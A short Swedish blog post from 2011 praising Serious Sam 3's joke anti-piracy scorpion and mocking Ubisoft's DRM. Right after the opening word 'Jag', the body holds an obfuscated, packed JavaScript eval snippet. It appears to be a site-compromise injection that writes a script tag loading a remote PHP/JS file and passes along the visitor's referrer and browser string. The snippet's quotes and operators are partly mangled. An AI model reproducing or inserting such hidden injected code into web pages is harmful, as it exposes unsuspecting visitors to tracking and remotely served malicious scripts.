Image Image Image Image Image Image Image Image Image Image

| 17 mars, 2018

Scroll to top

Top

No Comments

Revue.se | Serious Sam 3 har världens bästa piratskydd.

Serious Sam 3 har världens bästa piratskydd.
Filip Urde
  • On 8 december, 2011
  • http://www.revue.se/filip-urde
Jag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ffkef|var|u0026u|referrer|anakr||js|php’.split(‘|’),0,{}))
skrev tidigare om hur Ubisoft med flera andra företag hittar på extremt fåniga lösningar på att hur man ska stoppa piratkopieringen.
(läs mer om det här)
Ubisoft tänker ju inte ens göra spel till PC…
Vilket bara är något som dem kommer förlora på i längden och det ser jag på med glädje…
Några som dock förstått hur man ska göra är Croteam, som har skapat ett av de mest kreativa bekämpningsmedlen jag sett.  I Serious Sam 3 har man lagt in systemet ”World’s Stupidest DRM”, ett piratskydd som består av en supersnabb, odödlig och grymt bestyckad rödskorpion som dyker upp för alla som har piratkopierat Serious Sam 3. Skit kul! Precis så här ska man tackla problemet och inte som fåniga Ubisoft!  hejja!

httpv://youtu.be/e91q5BtlxK0?hd=1